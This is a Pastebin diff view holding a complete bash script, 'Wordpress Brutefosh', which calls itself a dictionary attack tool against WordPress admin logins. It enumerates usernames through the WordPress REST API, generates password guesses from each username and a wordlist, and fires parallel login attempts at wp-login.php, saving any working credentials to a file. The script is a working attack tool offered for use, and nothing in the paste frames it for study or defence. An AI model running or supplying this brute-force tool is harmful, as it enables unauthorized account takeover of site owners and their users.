API tools faq
paste
View difference between Paste ID: inLaCDB7 and vyqEfx0i
SHOW: | | - or go back to the newest paste.
1
#!/bin/bash
2
# Name       : Wordpress Brutefosh
3
# Version    : 2.0
4
# Desc.      : Dictionary Attack Tool - Wordpress Admin
5-
# Coded by   : Schopath
5+
6-
# Website    : www.zerobyte.id

6+
7
#----------- CONFIGURATION -----------

8
curl_timeout=20

9
multithread_limit=10

10
#--------- CONFIGURATION EOF ---------

11
12
if [[ -f wpusername.tmp ]]

13
then

14
	rm wpusername.tmp

15
fi

16
17
RED='\e[31m'

18
GRN='\e[32m'

19
YEL='\e[33m'

20
CLR='\e[0m'

21
22
function _GetUserWPJSON() {

23
	Target="${1}";

24
	UsernameLists=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")');

25
	echo ""

26
	if [[ -z ${UsernameLists} ]];

27
	then

28
		echo -e "${YEL}INFO: Cannot detect Username!${CLR}"

29
	else

30
		echo -ne > wpusername.tmp

31
		for Username in ${UsernameLists};

32
		do

33
			echo "INFO: Found username \"${Username}\"..."

34
			echo "${Username}" >> wpusername.tmp

35
		done

36
	fi

37
}

38
39
function _TestLogin() {

40
	Target="${1}"

41
	Username="${2}"

42
	Password="${3}"

43
	LetsTry=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s -w "\nHTTP_STATUS_CODE_X %{http_code}\n" "${Target}/wp-login.php" --data "log=${Username}&pwd=${Password}&wp-submit=Log+In" --compressed)

44
	if [[ ! -z $(echo ${LetsTry} | grep login_error | grep div) ]];

45
	then

46
		echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"

47
	elif [[ $(echo ${LetsTry} | grep "HTTP_STATUS_CODE_X" | awk '{print $2}') == "302" ]];

48
	then

49
		echo -e "${GRN}[!] FOUND ${Target} \e[30;48;5;82m ${Username}:${Password} ${CLR}"

50
		echo "${Target} [${Username}:${Password}]" >> wpbf-results.txt

51
	else

52
		echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"

53
	fi

54
}

55
56
function PasswdGenerator() {

57
	WORD="${1}"

58
	echo "${WORD}"

59
	echo "${WORD}" | tr a-z A-Z

60
	echo "${WORD}123"

61
	echo "${WORD}123" | tr a-z A-Z

62
	echo "${WORD}admin"

63
	echo "${WORD}${WORD}"

64
	echo "${WORD}${WORD}123"

65
	echo "${WORD}${WORD}" | tr a-z A-Z

66
	echo "${WORD}${WORD}123" | tr a-z A-Z

67
	foo=${WORD:0};echo ${foo^}

68
	foo=${WORD:0};echo ${foo^}123

69
	for ((c=1;c<=99;c++))

70
	do

71
		echo "${WORD}${c}"

72
	done

73
	for ((c=1;c<=9;c++))

74
	do

75
		echo "${WORD}0${c}"

76
	done

77
	for ((c=1900;c<=$(date +%Y);c++))

78
	do

79
		echo "${WORD}${c}"

80
	done

81
	for ((c=1;c<=99;c++))

82
	do

83
		foo=${WORD:0};echo ${foo^}${c}

84
	done

85
	for ((c=1;c<=9;c++))

86
	do

87
		foo=${WORD:0};echo ${foo^}0${c}

88
	done

89
	for ((c=1900;c<=$(date +%Y);c++))

90
	do

91
		foo=${WORD:0};echo ${foo^}${c}

92
	done

93
}

94
95
echo ' _    _               _                         '

96
echo '| |  | | ___  _ __ __| |_ __  _ __ ___  ___ ___ '

97
echo '| |/\| |/ _ \| `__/ _` | `_ \| `__/ _ \/ __/ __|'

98
echo '\  /\  / (_) | | | (_| | |_) | | |  __/\__ \__ \'

99
echo ' \/  \/ \___/|_|  \__,_| .__/|_|  \___||___/___/'

100
echo '                       |_|.::Brutefo(sh) 2019::.'

101
echo ''

102
103
echo -ne "[?] Input website target : "

104
read Target

105
106
curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-login.php" > wplogin.tmp

107
if [[ -z $(cat wplogin.tmp | grep "wp-submit") ]];

108
then

109
	echo -e "${RED}ERROR: Invalid wordpress wp-login!${CLR}"

110
	exit

111
fi

112
113
echo -ne "[?] Input password lists in (file) : "

114
read PasswordLists

115
116
if [[ ! -f ${PasswordLists} ]]

117
then

118
	echo -e "${RED}ERROR: Wordlists not found!${CLR}"

119
	PasswordLists=/dev/null

120
fi

121
122
_GetUserWPJSON ${Target}

123
124
if [[ -f wpusername.tmp ]]

125
then

126
	for User in $(cat wpusername.tmp)

127
	do

128
		echo "INFO: Generate password from ${User}..."

129
		echo -ne "" > wpbf-passwords.lst.tmp

130
		PasswdGenerator ${User} >> wpbf-passwords.lst.tmp

131
		cat ${PasswordLists} >> wpbf-passwords.lst.tmp

132
		(

133
			for Pass in $(cat wpbf-passwords.lst.tmp)

134
			do

135
				((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait

136
				_TestLogin ${Target} ${User} ${Pass} &

137
			done

138
			wait

139
		)

140
	done

141
	echo -ne "" > wpbf-passwords.lst.tmp

142
	rm wpbf-passwords.lst.tmp

143
else

144
	echo -e "${YEL}INFO: Cannot find username${CLR}"

145
	echo -ne "[?] Input username manually : "

146
	read User

147
	if [[ -z ${User} ]]

148
	then

149
		echo -e "${RED}ERROR: Username cannot be empty!${CLR}"

150
		exit

151
	fi

152
	echo "INFO: Generate password from ${User}..."

153
	echo -ne "" > wpbf-passwords.lst.tmp

154
	PasswdGenerator ${User} >> wpbf-passwords.lst.tmp

155
	cat ${PasswordLists} >> wpbf-passwords.lst.tmp

156
	(

157
		for Pass in $(cat wpbf-passwords.lst.tmp)

158
		do

159
			((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait

160
			_TestLogin ${Target} ${User} ${Pass} &

161
		done

162
		wait

163
	)

164
	echo -ne "" > wpbf-passwords.lst.tmp

165
	rm wpbf-passwords.lst.tmp

166
fi

167
echo "INFO: Found $(cat wpbf-results.txt | grep ${Target} | sort -nr | uniq | wc -l) username & password in ./wpbf-results.txt"
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!